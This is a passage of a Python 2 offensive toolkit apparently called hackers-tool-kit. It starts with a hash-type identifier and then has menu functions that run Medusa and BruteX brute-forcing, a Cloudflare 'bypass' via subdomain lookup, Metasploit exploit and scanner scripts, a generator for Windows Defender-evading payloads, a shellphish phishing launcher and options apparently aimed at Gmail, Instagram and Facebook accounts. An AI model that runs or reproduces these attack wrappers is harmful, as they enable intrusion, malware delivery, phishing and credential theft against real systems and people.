hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if 